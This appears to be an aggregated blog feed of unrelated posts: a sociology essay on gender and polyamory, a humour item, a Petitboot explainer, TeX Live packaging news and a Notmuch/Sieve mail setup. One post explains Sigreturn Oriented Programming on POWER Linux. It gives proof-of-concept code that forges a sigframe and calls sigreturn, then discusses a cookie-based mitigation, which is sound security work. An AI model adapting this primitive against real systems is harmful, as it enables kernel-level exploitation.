When Katniss is with Peeta, she does a form of masculinity in relationship and reaction to his behavior and vice versa.  Because Peeta “calls out” protection, Katniss steps up.  When Gale calls out nurturing, she plays the part.  In other words, not only is gender a “doing” rather than a “being,” it is also an interactive process.  Because Katniss is in relationship to both Peeta and Gale, and because each embodies and calls out different ways of doing gender, Katniss oscillates between being the “movie boyfriend” sometimes and the “movie girlfriend” other times and, it seems, she’s facile and takes pleasure in doing all of it.  If Katniss has to “choose” Peeta or Gale, she will have to give up doing gender in this splendid, and, dare I say, feminist and queer way in order to “fit” into her and her “girlfriend’s” or “boyfriend’s” relationship.

Now imagine a world in which Katniss wouldn’t have to choose.

What if she could be in a relationship with Peeta and get her needs for being understood, nurtured, and protective while also getting her girl on with Gale?  In other words, imagine a world without compulsory monogamy where having two or more boyfriends or girlfriends was possible.

I’m currently working on a book on monogamy and the queer potential for open and polyamorous relationships. I’m writing about the ways in which compulsory monogamy fits nicely into and perpetuates cultural ideas about masculinity and femininity and how different forms of non-monogamy might open up alternative ways of doing, not just relationships, but also gender.

Forcing Katniss to choose is forcing Katniss into monogamy, and as I suggested above, into doing gender to complement her partner.  Victoria Robinson points out in her article, “My Baby Just Cares for Me,” that monogamy compels women to invest too much time, energy, and resources into an individual man and limits their autonomy and relationships with others.  What Robinson doesn’t talk about is how it also limits women’s range of how they might do gender in relationship to others.

It also limits men’s range of doing gender in relationships.  Wouldn’t it be nice if Peeta and Gale never felt the pressure to be something they are not?  Imagine how Peeta’s and Gale’s masculinities would have to be reconfigured to accommodate and accept each other?

Elisabeth Sheff, in her groundbreaking research on polyamorous people, found that both women and men in polyamorous relationships say that the men have to rethink their masculinities to be less possessive, women have room to be more assertive about their needs and desires, and men are more accommodating.

What this suggests is that monogamy doesn’t just limit WHO you can do; it also limits WHAT you can do in terms of gender.  Might I suggest that Katniss is such a well-rounded woman character precisely because she is polyamorous?  She’s not just the phallic girl with the gun… or bow in this case… or the damsel in distress.  She’s strong, vulnerable, capable, nurturing, and loyal, and we get to see all of it because she does gender differently with her boyfriends.  And therein, I believe, is one way that polyamory has a queer and feminist potential.  It can open up the field of doing gender within the context of relationships.

I don’t know how her story ends, but I, for one, am hoping that, if there is a happily-ever-after for Katniss, it’s not because girl gets boy; it’s because girl gets both boys.

Mimi Schippers, PhD is an Associate Professor of Sociology at Tulane University.  Her new book on the radical potential of non-monogamy is called Beyond Monogamy: Polyamory and the Future of Polyqueer Sexualities. You can follow her at Marx in Drag.

Originally posted in 2013 at Marx in Drag. Cross-posted at Huffington Post, and Jezebel. Images from IMDB

(View original at https://thesocietypages.org/socimages)

Planet Linux AustraliaChris Smart: Signal Return Orientated Programming attacks

When a process is interrupted, the kernel suspends it and stores its state in a sigframe which is placed on the stack. The kernel then calls the appropriate signal handler code and after a sigreturn system call, reads the sigframe off the stack, restores state and resumes the process. However, by crafting a fake sigframe, we can trick the kernel into executing something else.

My friend Rashmica, an intern at OzLabs, has written an interesting blog post about this for some work she’s doing with the POWER architecture in Linux.

Worse Than FailureError'd: Sorry About the Moon

"I have no idea what that giant glowing ball in the sky is. Space aliens, I suppose?" wrote Ian S.

 

Andreas writes, "LAN (the airline) and I seem to have differing definitions of optional."

 

"Upgrade? More looks more like a mutation to me," wrote Samuel G.

 

"I received this email with my ticket for a concert in the Netherlands," Martin B. writes, "Apparently learning Dutch is going to be harder than I was anticipating."

 

Roger writes, "Um...is Pidgin trying to tell me something?"

 

"Looks like the Carbon Capture and Storage Association should really capture and store some links," wrote M. W.

 

James D. writes, "I kid you not, this is what management wants us to use instead of our own in-house bug tracker!"

 


Planet Linux Australiasthbrx - a POWER technical blog: SROP Mitigation

What is SROP?

Sigreturn Oriented Programming - a general technique that can be used as an exploit, or as a backdoor to exploit another vulnerability.

Okay, but what is it?

Yeah... Let me take you through some relevant background info, where I skimp on the details and give you the general picture.

In Linux, software interrupts are called signals. More about signals here! Generally a signal will convey some information from the kernel and so most signals will have a specific signal handler (some code that deals with the signal) setup.

Signals are asynchronous - ie they can be sent to a process/program at anytime. When a signal arrives for a process, the kernel suspends the process. The kernel then saves the 'context' of the process - all the general purpose registers (GPRs), the stack pointer, the next-instruction pointer etc - into a structure called a 'sigframe'. The sigframe is stored on the stack, and then the kernel runs the signal handler. At the very end of the signal handler, it calls a special system call called 'sigreturn' - indicating to the kernel that the signal has been dealt with. The kernel then grabs the sigframe from the stack, restores the process's context and resumes the execution of the process.

This is the rough mental picture you should have:

Double Format

Okay... but you still haven't explained what SROP is..?

Well, if you insist...

The above process was designed so that the kernel does not need to keep track of what signals it has delivered. The kernel assumes that the sigframe it takes off the stack was legitimately put there by the kernel because of a signal. This is where we can trick the kernel!

If we can construct a fake sigframe, put it on the stack, and call sigreturn, the kernel will assume that the sigframe is one it put there before and will load the contents of the fake context into the CPU's registers and 'resume' execution from where the fake sigframe tells it to. And that is what SROP is!

Well that sounds cool, show me!

Firstly we have to set up a (valid) sigframe:

By valid sigframe, I mean a sigframe that the kernel will not reject. Luckily most architectures only examine a few parts of the sigframe to determine the validity of it. Unluckily, you will have to dive into the source code to find out which parts of the sigframe you need to set up for your architecture. Have a look in the function which deals with the syscall sigreturn (probably something like sys_sigreturn() ).

For a real time signal on a little endian powerpc 64bit machine, the sigframe looks something like this:

struct rt_sigframe {
        struct ucontext uc;
        unsigned long _unused[2];
        unsigned int tramp[TRAMP_SIZE];
        struct siginfo __user *pinfo;
        void __user *puc;
        struct siginfo info;
        unsigned long user_cookie;
        /* New 64 bit little-endian ABI allows redzone of 512 bytes below sp */
        char abigap[USER_REDZONE_SIZE];
} __attribute__ ((aligned (16)));

The most important part of the sigframe is the context or ucontext as this contains all the register values that will be written into the CPU's registers when the kernel loads in the sigframe. To minimise potential issues we can copy valid values from the current GPRs into our fake ucontext:

register unsigned long r1 asm("r1");
register unsigned long r13 asm("r13");
struct ucontext ctx = { 0 };

/* We need a system thread id so copy the one from this process */
ctx.uc_mcontext.gp_regs[PT_R13] = r13;

/*  Set the context's stack pointer to where the current stack pointer is pointing */
ctx.uc_mcontext.gp_regs[PT_R1] = r1;

We also need to tell the kernel where to resume execution from. As this is just a test to see if we can successfully get the kernel to resume execution from a fake sigframe we will just point it to a function that prints out some text.

/* Set the next instruction pointer (NIP) to the code that we want executed */
ctx.uc_mcontext.gp_regs[PT_NIP] = (unsigned long) test_function;

For some reason the sys_rt_sigreturn() on little endian powerpc 64bit checks the endianness bit of the ucontext's MSR register, so we need to set that:

/* Set MSR bit if LE */
ctx.uc_mcontext.gp_regs[PT_MSR] = 0x01;

Fun fact: not doing this or setting it to 0 results in the CPU switching from little endian to big endian! For a powerpc machine sys_rt_sigreturn() only examines ucontext, so we do not need to set up a full sigframe.

Secondly we have to put it on the stack:

/* Set current stack pointer to our fake context */
r1 = (unsigned long) &ctx;

Thirdly, we call sigreturn:

/* Syscall - NR_rt_sigreturn */
asm("li 0, 172\n");
asm("sc\n");

When the kernel receives the sigreturn call, it looks at the userspace stack pointer for the ucontext and loads this in. As we have put valid values in the ucontext, the kernel assumes that this is a valid sigframe that it set up earlier, loads the contents of the ucontext into the CPU's registers and resumes execution of the process from the address we pointed the NIP to.

Obviously, you need something worth executing at this address, but sadly that next part is not in my job description. This is a nice gateway into the kernel though and would pair nicely with another kernel vulnerability. If you are interested in some more in depth examples, have a read of this paper.

So how can we mitigate this?

Well, I'm glad you asked. We need some way of distinguishing between sigframes that were put there legitimately by the kernel and 'fake' sigframes. The current idea that is being thrown around is cookies, and you can see the x86 discussion here.

The proposed solution is to give every sighand struct a randomly generated value. When the kernel constructs a sigframe for a process, it stores a 'cookie' with the sigframe. The cookie is a hash of the cookie's location and the random value stored in the sighand struct for the process. When the kernel receives a sigreturn, it hashes the location where the cookie should be with the randomly generated number in sighand struct - if this matches the cookie, the cookie is zeroed, the sigframe is valid and the kernel will restore this context. If the cookies do not match, the sigframe is not restored.
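Here is a rough user-space sketch of that check; the helper names and the hash are made up for illustration and are not the proposed kernel code:

#include <stdint.h>

/* Cookie = keyed hash of the per-sighand secret and the cookie's own location. */
static uint64_t sigframe_cookie(uint64_t sighand_secret, const uint64_t *slot)
{
        return (sighand_secret ^ (uint64_t)(uintptr_t)slot) * 0x9E3779B97F4A7C15ULL;
}

/* On delivery the kernel stores the cookie next to the sigframe; on sigreturn it
 * recomputes it, compares, zeroes the slot and only restores the context on a match. */
static int sigframe_cookie_valid(uint64_t sighand_secret, uint64_t *slot)
{
        int ok = (*slot == sigframe_cookie(sighand_secret, slot));
        *slot = 0;      /* single use: a replayed frame will no longer match */
        return ok;
}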

Potential issues:

  • Multithreading: Originally the random number was suggested to be stored in the task struct. However, this would break multi-threaded applications as every thread has its own task struct. As the sighand struct is shared by threads, this should not adversely affect multithreaded applications.
  • Cookie location: At first I put the cookie on top of the sigframe. However some code in userspace assumed that all the space between the signal handler and the sigframe was essentially up for grabs and would zero the cookie before I could read the cookie value. Putting the cookie below the sigframe was also a no-go due to the ABI-gap (a gap below the stack pointer that signal code cannot touch) being a part of the sigframe. Putting the cookie inside the sigframe, just above the ABI gap has been fine with all the tests I have run so far!
  • Movement of sigframe: If you move the sigframe on the stack, the cookie value will no longer be valid... I don't think that this is something that you should be doing, and have not yet come across a scenario that does this.

For a more in-depth explanation of SROP, click here.

Planet Linux Australiasthbrx - a POWER technical blog: Tell Me About Petitboot

A Google search for 'Petitboot' brings up results from a number of places, some describing its use on POWER servers, others talking about how to use it on the PS3, in varying levels of detail. I tend to get a lot of general questions about Petitboot and its behaviour, and have had a few requests for a broad "Welcome to Petitboot" blog, suggesting that existing docs deal with more specific topics.. or that people just aren't reading them :)

So today we're going to take a bit of a crash course in the what, why, and possibly how of Petitboot. I won't delve too much into technical details, and this will be focussed on Petitboot in POWER land since that's where I spend most of my time. Here we go!

What

Aside from a whole lot of firmware and kernel logs flying past, the first thing you'll see when booting a POWER server (in OPAL mode, at least) is Petitboot's main menu:

Main Menu

Petitboot is the first interact-able component a user will see. The word 'BIOS' gets thrown around a lot when discussing this area, but that is wrong, and the people using that word are wrong.

When the OPAL firmware layer Skiboot has finished its own set up, it loads a certain binary (stored on the BMC) into memory and jumps into it. This could hypothetically be anything, but for any POWER server right now it is 'Skiroot'. Skiroot is a full Linux kernel and userspace, which runs Petitboot. People often say Petitboot when they mean Skiroot - technically Petitboot is the server and UI processes that happen to run within Skiroot, and Skiroot is the full kernel and rootfs package. This is more obvious when you look at the op-build project - Petitboot is a package built as part of the kernel and rootfs created by Buildroot.

Petitboot is made of two major parts - the UI processes (one for each available console), and the 'discover' server. The discover server updates the UI processes, manages and scans available disks and network devices, and performs the actual booting of host operating systems. The UI, running in ncurses, displays these options, allows the user to edit boot options and system configuration, and tells the server which boot option to kexec.
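Conceptually (this is only an illustration, not the literal code pb-discover runs), booting the selected option comes down to a kexec of the chosen kernel:

# load the target kernel and initramfs, then jump into them
kexec -l /mnt/sda2/boot/vmlinux --initrd=/mnt/sda2/boot/initrd.img \
      --append="root=/dev/sda2 ro"
kexec -e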

Why

The 'why' delves into some of the major architectural differences between a POWER machine and your average x86 machine which, as always, could spread over several blog posts and/or a textbook.

POWER processors don't boot themselves; instead, the attached Baseboard Management Controller (BMC) does a lot of low-level poking that gets the primary processor into a state where it is ready to execute instructions. PowerVM systems would then jump directly into the PHYP hypervisor - any subsequent OS, be it AIX or Linux, would then run as a 'partition' under this hypervisor.

What we all really want though is to run Linux directly on the hardware, which meant a new boot process would have to be thought up while still maintaining compatibility with PowerVM so systems could be booted in either mode. Thus became OPAL, and its implementation Skiboot. Skipping over so much detail, the system ends up booting into Skiboot which acts as our firmware layer. Skiboot isn't interactive and doesn't really care about things like disks, so it loads another binary into memory and executes it - Skiroot!

Skiroot exists as an alternative to writing a whole new bootloader just for POWER in OPAL mode, or going through the effort to port an existing bootloader to understand the specifics of POWER. Why do all that when Linux already exists and already knows how to handle disks, network interfaces, and a thousand other things? Not to mention that when Linux gains support for fancy new devices so do we, and adding new features of our own is as simple as writing your average Linux program.

Skiroot itself (not including Skiboot) is roughly comparable to UEFI, or at least much more so than legacy BIOS implementations. But whereas UEFI tends to be a monolithic blob of fairly platform-specific code (in practice), Skiroot is simply a small Linux environment that anyone could put together with Buildroot.

A much better insight into the development and motivation behind Skiroot and Petitboot is available in Jeremy's LCA2013 talk.

Back to Petitboot

Petitboot is the part of the 'bootloader' that did need to be written, because users probably wouldn't be too thrilled if they had to manually mount disks and kexec their kernels every time they booted the machine. The Petitboot server process mounts any available disk devices and scans them for available operating systems. That's not to say that it scans the entire disk, because otherwise you could be waiting for quite some time, but rather it looks in a list of common locations for bootloader configuration files. This is handy because it means the operating system doesn't need to have any knowledge of Petitboot - it just uses its usual install scripts and Petitboot reads them to know what is available. At the same time Petitboot makes PXE requests on configured network interfaces so we can netboot, and allows these various sources to be given relative priorities for auto-boot, plus a number of other ways to specially configure booting behaviour.

A particularly neat feature of existing in a Linux environment is the ability to easily recover from boot problems; whereas on another system you might need to use a Live CD to fix a misconfiguration or recover a broken filesystem, in Skiroot you can just drop to the shell and fix the issue right there.

In summary, Petitboot/Skiroot is a small but capable Linux environment that every OPAL POWER machine boots into, gathering up all the various local and remote boot possibilities, and presenting them to you in a state-of-the-art ncurses interface. Petitboot updates all the time, and if you come across a feature that you think Petitboot is missing, patches are very welcome at petitboot@lists.ozlabs.org (or hassle me on IRC)!

Planet DebianNorbert Preining: TeX Live 2016 (pretest) hits Debian/unstable

The sources of TeX Live binaries are now (hopefully) frozen, and barring unpleasant surprises, this will be the code going into the final release (one fix for luatex is coming, though). Thus, I thought it was time to upload TeX Live 2016 packages to Debian/unstable to expose them to a wider testing area – packages in experimental receive hardly any testing.

texlive-2016-debian-pretest

The biggest changes are with Luatex, where APIs were changed fundamentally and practically each package using luatex specific code needs to be adjusted. Most of the package authors have already uploaded fixed versions to CTAN and thus to TeX Live, but some are surely still open. I have taken the step to provide driver files for pgf and pgfplots to support pgf with luatex (as I need it myself).

One more thing to be mentioned is that the binaries finally bring support for reproducible builds by supporting the SOURCE_DATE_EPOCH environment variable.
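For example (the epoch value below is arbitrary), pinning the variable should make the dates pdftex embeds in the resulting PDF deterministic:

SOURCE_DATE_EPOCH=1464739200 pdflatex document.tex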

Please send bug reports, suggestions, and improvements (patches welcome!) to improve the quality of the packages. In particular, lintian complains a lot about various man page problems. If someone wants to go through all that it would help a lot. Details on request.

Other than that, many packages have been updated or added since the last Debian packages, here are the incomplete lists (I had accidentally deleted the tlmgr.log file at some point):

new: acmart, chivo, coloring, dvisvgm-def, langsci, makebase, pbibtex-base, platex, ptex-base, ptex-fonts, rosario, uplatex, uptex-base, uptex-fonts.

updated: achemso, acro, arabluatex, arydshln, asymptote, babel-french, biblatex-ieee, bidi, bookcover, booktabs, bxjscls, chemformula, chemmacros, cslatex, csplain, cstex, dtk, dvips, epspdf, fibeamer, footnotehyper, glossaries, glossaries-extra, gobble, graphics, gregoriotex, hyperref, hyperxmp, jadetex, jslectureplanner, koma-script, kpathsea, latex-bin, latexmk, lollipop, luaotfload, luatex, luatexja, luatexko, mathastext, mcf2graph, mex, microtype, msu-thesis, m-tx, oberdiek, pdftex, pdfx, pgf, pgfplots, platex, pmx, pst-cie, pst-func, pst-ovl, pst-plot, ptex, ptex-fonts, reledmac, shdoc, substances, tasks, tetex, tools, uantwerpendocs, ucharclasses, uplatex, uptex, uptex-fonts, velthuis, xassoccnt, xcolor, xepersian, xetex, xgreek, xmltex.

Enjoy.

,

Planet DebianAntoine Beaupré: Notmuch, offlineimap and Sieve setup

I've been using Notmuch since about 2011, switching away from Mutt to deal with the monstrous amount of email I was, and still am, dealing with on the computer. I have contributed a few patches and configs on the Notmuch mailing list, but basically, I have given up on merging patches, and instead have a custom config in Emacs that extends it the way I want. In the last 5 years, Notmuch has progressed significantly, so I haven't found the need to patch it or make sweeping changes.

The huge INBOX of death

The one thing that is problematic with my use of Notmuch is that I end up with a ridiculously large INBOX folder. Before the cleanup I did this morning, I had over 10k emails in there, out of about 200k emails overall.

Since I mostly work from my laptop these days, the Notmuch tags are only on the laptop, and not propagated to the server. This makes accessing the mail spool directly, from webmail or simply through a local client (say Mutt) on the server, really inconvenient, because it has to load a very large spool of mail, which is very slow in Mutt. Even worse, a bunch of mail that was archived in Notmuch shows up in the spool, because archiving in Notmuch just removes tags: the mails are still in the inbox, even though they are marked as read.

So I was hoping that Notmuch would help me deal with the giant inbox of death problem, but in fact, when I don't use Notmuch, it actually makes the problem worse. Today, I did a bunch of improvements to my setup to fix that.

The first thing I did was to kill procmail, which I was surprised to discover has been dead for over a decade. I switched over to Sieve for filtering, having already switched to Dovecot a while back on the server. I tried to use the procmail2sieve.pl conversion tool but it didn't work very well, so I basically rewrote the whole file. Since I was mostly using Notmuch for filtering, there wasn't much left to convert.

Sieve filtering

But this is where things got interesting: Sieve is so much simpler to use and more intuitive that I started doing more interesting stuff in bridging the filtering system (Sieve) with the tagging system (Notmuch). Basically, I use Sieve to split large chunks of emails off my main inbox, to try to remove as much spam, bulk email, notifications and mailing lists as possible from the larger flow of emails. Then Notmuch comes in and does some fine-tuning, assigning tags to specific mailing lists or topics, and being generally the awesome search engine that I use on a daily basis.
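The Notmuch side of that split can live in a post-new hook; a sketch of what such a hook might look like (the folder and tag names are examples, and it assumes new mail arrives with the "new" tag):

#!/bin/sh
# tag what Sieve already filed into folders
notmuch tag +debian -- folder:debian and tag:new
notmuch tag +lists  -- folder:lists and tag:new
notmuch tag -inbox  -- folder:junk and tag:new
# drop the "new" marker once everything has been processed
notmuch tag -new    -- tag:new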

Dovecot and Postfix configs

For all of this to work, I had to tweak my mail servers to talk sieve. First, I enabled sieve in Dovecot:

--- a/dovecot/conf.d/15-lda.conf
+++ b/dovecot/conf.d/15-lda.conf
@@ -44,5 +44,5 @@

 protocol lda {
   # Space separated list of plugins to load (default is global mail_plugins).
-  #mail_plugins = $mail_plugins
+  mail_plugins = $mail_plugins sieve
 }

Then I had to switch from procmail to dovecot for local delivery, that was easy, in Postfix's perennial main.cf:

#mailbox_command = /usr/bin/procmail -a "$EXTENSION"
mailbox_command = /usr/lib/dovecot/dovecot-lda -a "$RECIPIENT"

Note that dovecot takes the full recipient as an argument, not just the extension. That's normal. It's clever, it knows that kind of stuff.

One last tweak I did was to enable automatic mailbox creation and subscription, so that the automatic extension filtering (below) can create mailboxes on the fly:

--- a/dovecot/conf.d/15-lda.conf
+++ b/dovecot/conf.d/15-lda.conf
@@ -37,10 +37,10 @@
 #lda_original_recipient_header =

 # Should saving a mail to a nonexistent mailbox automatically create it?
-#lda_mailbox_autocreate = no
+lda_mailbox_autocreate = yes

 # Should automatically created mailboxes be also automatically subscribed?
-#lda_mailbox_autosubscribe = no
+lda_mailbox_autosubscribe = yes

 protocol lda {
   # Space separated list of plugins to load (default is global mail_plugins).

Sieve rules

Then I had to create a Sieve ruleset. That thing lives in ~/.dovecot.sieve, since I'm running Dovecot. Your provider may accept an arbitrary ruleset like this, or you may need to go through a web interface, or who knows. I'm assuming you're running Dovecot and have a shell from now on.

The first part of the file is simply to enable a bunch of extensions, as needed:

# Sieve Filters
# http://wiki.dovecot.org/Pigeonhole/Sieve/Examples
# https://tools.ietf.org/html/rfc5228
require "fileinto";
require "envelope";
require "variables";
require "subaddress";
require "regex";
require "vacation";
require "vnd.dovecot.debug";

Some of those are not used yet; for example, I haven't tested the vacation module yet, but I have high hopes that I can use it to announce a special "urgent" mailbox while I'm traveling. The rationale is to have a distinct mailbox for urgent messages, announced in the autoreply, that hopefully won't be parsable by bots.

Spam filtering

Then I filter spam using this fairly standard expression:

########################################################################
# spam 
# possible improvement, server-side:
# http://wiki.dovecot.org/Pigeonhole/Sieve/Examples#Filtering_using_the_spamtest_and_virustest_extensions
if header :contains "X-Spam-Flag" "YES" {
  fileinto "junk";
  stop;
} elsif header :contains "X-Spam-Level" "***" {
  fileinto "greyspam";
  stop;
}

This puts stuff into the junk or greyspam folder, based on the severity. I am very aggressive with spam: stuff often ends up in the greyspam folder, which I need to check from time to time, but it beats having too much spam in my inbox.

Mailing lists

Mailing lists are generally put into a lists folder, with some mailing lists getting their own folder:

########################################################################
# lists
# converted from procmail
if header :contains "subject" "FreshPorts" {
    fileinto "freshports";
} elsif header :contains "List-Id" "alternc.org" {
    fileinto "alternc";
} elsif header :contains "List-Id" "koumbit.org" {
    fileinto "koumbit";
} elsif header :contains ["to", "cc"] ["lists.debian.org",
                                       "anarcat@debian.org"] {
    fileinto "debian";
# Debian BTS
} elsif exists "X-Debian-PR-Message" {
    fileinto "debian";
# default lists fallback
} elsif exists "List-Id" {
    fileinto "lists";
}

The idea here is that I can safely subscribe to lists without polluting my mailbox by default. Further processing is done in Notmuch.

Extension matching

I also use the magic +extension tag on emails. If you send email to, say, anarcat+foo@example.com, the email ends up in the foo folder, named after the extension. This is done with the help of the following recipe:

########################################################################
# wildcard +extension
# http://wiki.dovecot.org/Pigeonhole/Sieve/Examples#Plus_Addressed_mail_filtering
if envelope :matches :detail "to" "*" {
  # Save the detail part (what follows the '+') in ${name}, lowercased,
  # so mail to anarcat+foo@... is filed into the 'foo' folder.
  set :lower "name" "${1}";
  fileinto "${name}";
  #debug_log "filed into mailbox ${name} because of extension";
  stop;
}

This is actually very effective: any time I register to a service, I try as much as possible to add a +extension that describes the service. Of course, spammers and marketers (it's the same really) are free to drop the extension and I suspect a lot of them do, but it helps with honest providers and this actually sorts a lot of stuff out of my inbox into topically-defined folders.
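
To make the mapping concrete, here is a small illustration (a Python sketch, not part of the actual setup; the address and helper name are made up) of what the rule above computes:

# Illustration only: mail to user+detail@host is filed into the "detail"
# folder, lowercased, mirroring the Sieve rule above.
def extension_folder(address):
    localpart = address.split('@', 1)[0]
    if '+' not in localpart:
        return None  # no detail part: the rule does not match
    return localpart.split('+', 1)[1].lower()

print(extension_folder('anarcat+foo@example.com'))  # prints: foo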

It is also a security issue: someone could flood my filesystem with tons of mail folders, which would cripple the IMAP server and eat all the inodes, 4 times faster than just sending emails. But I guess I'll cross that bridge when I get there: anyone can flood my address and I have other mechanisms to deal with this.

The trick is to then assign tags to all folders so that they appear in the Notmuch-emacs welcome view:

echo tagging folders
for folder in $(ls -ad $HOME/Maildir/${PREFIX}*/ | egrep -v "Maildir/${PREFIX}(feeds.*|Sent.*|INBOX/|INBOX/Sent)\$"); do
    tag=$(echo $folder | sed 's#/$##;s#^.*/##')
    notmuch tag +$tag -inbox tag:inbox and not tag:$tag and folder:${PREFIX}$tag
done

This is part of my notmuch-tag script that includes a lot more fine-tuned filtering, detailed below.

Automated reports filtering

Another thing I get a lot of is machine-generated "spam". Well, it's not commercial spam, but it's a bunch of Nagios, cron jobs, and god knows what software that thinks it's important to send me emails every day. I get a lot less of those these days since I'm off work at Koumbit, but still, these rules can be useful for others as well:

if anyof (exists "X-Cron-Env",
          header :contains ["subject"] ["security run output",
                                        "monthly run output",
                                        "daily run output",
                                        "weekly run output",
                                        "Debian Package Updates",
                                        "Debian package update",
                                        "daily mail stats",
                                        "Anacron job",
                                        "nagios",
                                        "changes report",
                                        "run output",
                                        "[Systraq]",
                                        "Undelivered mail",
                                        "Postfix SMTP server: errors from",
                                        "backupninja",
                                        "DenyHosts report",
                                        "Debian security status",
                                        "apt-listchanges"
                                        ],
           header :contains "Auto-Submitted" "auto-generated",
           envelope :contains "from" ["nagios@",
                                      "logcheck@"])
    {
    fileinto "rapports";
}
# imported from procmail
elsif header :comparator "i;octet" :contains "Subject" "Cron" {
  if header :regex :comparator "i;octet"  "From" ".*root@" {
        fileinto "rapports";
  }
}
elsif header :comparator "i;octet" :contains "To" "root@" {
  if header :regex :comparator "i;octet"  "Subject" "\\*\\*\\* SECURITY" {
        fileinto "rapports";
  }
}
elsif header :contains "Precedence" "bulk" {
    fileinto "bulk";
}

Refiltering emails

Of course, after all this I still had thousands of emails in my inbox, because the sieve filters apply only to new emails. The beauty of Sieve support in Dovecot is that there is a neat sieve-filter command that can reprocess an existing mailbox. That was a lifesaver. To run a specific sieve filter on a mailbox, I simply run:

sieve-filter .dovecot.sieve INBOX 2>&1 | less

Well, this doesn't do anything. To really execute the filters, you need the -e flag, and to write the changes back to the INBOX for real, you need the -W flag as well, so the real run looks something more like this:

sieve-filter -e -W -v .dovecot.sieve INBOX > refilter.log 2>&1

The funky output redirects are necessary because this outputs a lot of crap. Also note that, unfortunately, the dry-run output differs from the real run and is actually more verbose, which makes it less useful than it could be.

Archival

I also usually archive my mails every year, rotating my mailbox into an Archive.YYYY directory. For example, now all mails from 2015 are archived in an Archive.2015 directory. I used to do this with Mutt tagging and it was a little slow and error-prone. Now, I simply have this Sieve script:

require ["variables","date","fileinto","mailbox", "relational"];

# Extract date info
if currentdate :matches "year" "*" { set "year" "${1}"; }

if date :value "lt" :originalzone "date" "year" "${year}" {
  if date :matches "received" "year" "*" {
    # Archive mail into a folder named after the year it was received.
    # Create the folder when it does not exist.
    fileinto :create "Archive.${1}";
  }
}

I went from 15613 to 1040 emails in my real inbox with this process (including refiltering with the default filters as well).

Notmuch configuration

My Notmuch configuration is in three parts: I have small settings in ~/.notmuch-config. The gist of it is:

[new]
tags=unread;inbox;
ignore=

#[maildir]
# synchronize_flags=true
# tentative patch that was refused upstream
# http://mid.gmane.org/1310874973-28437-1-git-send-email-anarcat@koumbit.org
#reckless_trash=true

[search]
exclude_tags=deleted;spam;

I omitted the fairly trivial [user] section for privacy reasons and the [database] section to reduce clutter.

Then I have a notmuch-tag script symlinked into ~/Maildir/.notmuch/hooks/post-new. It does way too much stuff to describe in detail here, but here are a few snippets:

if hostname | grep angela > /dev/null; then
    PREFIX=Anarcat/
else
    PREFIX=.
fi

This sets a variable that makes the script work both on my laptop (angela), where mailboxes are in Maildir/Anarcat/foo, and on the server, where mailboxes are in Maildir/.foo.

I also have special rules to tag my RSS feeds, which are generated by feed2imap (documented below):

echo tagging feeds
( cd $HOME/Maildir/ && for feed in ${PREFIX}feeds.*; do
    name=$(echo $feed | sed "s#${PREFIX}feeds\\.##")
    notmuch tag +feeds +$name -inbox folder:$feed and not tag:feeds
done )

Another useful example is how to tag mailing lists; for instance, this removes the inbox tag and adds the lists and notmuch tags to emails from the notmuch mailing list.

notmuch tag +lists +notmuch      -inbox tag:inbox and "to:notmuch@notmuchmail.org"

Finally, I have a bunch of special keybindings in ~/.emacs.d/notmuch-config.el:

;; autocompletion
(eval-after-load "notmuch-address"
  '(progn
     (notmuch-address-message-insinuate)))

; use fortune for signature, config is in custom
(add-hook 'message-setup-hook 'fortune-to-signature)
; don't remember what that is
(add-hook 'notmuch-show-hook 'visual-line-mode)

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; keymappings
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
(define-key notmuch-show-mode-map "S"
  (lambda ()
    "mark message as spam and advance"
    (interactive)
    (notmuch-show-tag '("+spam" "-unread"))
    (notmuch-show-next-open-message-or-pop)))

(define-key notmuch-search-mode-map "S"
  (lambda (&optional beg end)
    "mark message as spam and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "+spam" "-unread") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-show-mode-map "H"
  (lambda ()
    "mark message as spam and advance"
    (interactive)
    (notmuch-show-tag '("-spam"))
    (notmuch-show-next-open-message-or-pop)))

(define-key notmuch-search-mode-map "H"
  (lambda (&optional beg end)
    "mark message as spam and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "-spam") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-search-mode-map "l" 
  (lambda (&optional beg end)
    "undelete and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "-unread") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-search-mode-map "u"
  (lambda (&optional beg end)
    "undelete and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "-deleted") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-search-mode-map "d"
  (lambda (&optional beg end)
    "delete and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "+deleted" "-unread") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-show-mode-map "d"
  (lambda ()
    "delete current message and advance"
    (interactive)
    (notmuch-show-tag '("+deleted" "-unread"))
    (notmuch-show-next-open-message-or-pop)))

;; https://notmuchmail.org/emacstips/#index17h2
(define-key notmuch-show-mode-map "b"
  (lambda (&optional address)
    "Bounce the current message."
    (interactive "sBounce To: ")
    (notmuch-show-view-raw-message)
    (message-resend address)
    (kill-buffer)))

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; my custom notmuch functions
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
(defun anarcat/notmuch-search-next-thread (&optional beg end)
  "Skip to next message from region or point.

This is necessary because notmuch-search-next-thread just starts
from point, whereas it seems to me more logical to start from the
end of the region."
  ;; move point to just before the end of the region, if there is one
  (when (and beg end (/= beg end))
    (goto-char (- end 1)))
  (notmuch-search-next-thread))

;; Linking to notmuch messages from org-mode
;; https://notmuchmail.org/emacstips/#index23h2
(require 'org-notmuch nil t)

(message "anarcat's custom notmuch config loaded")

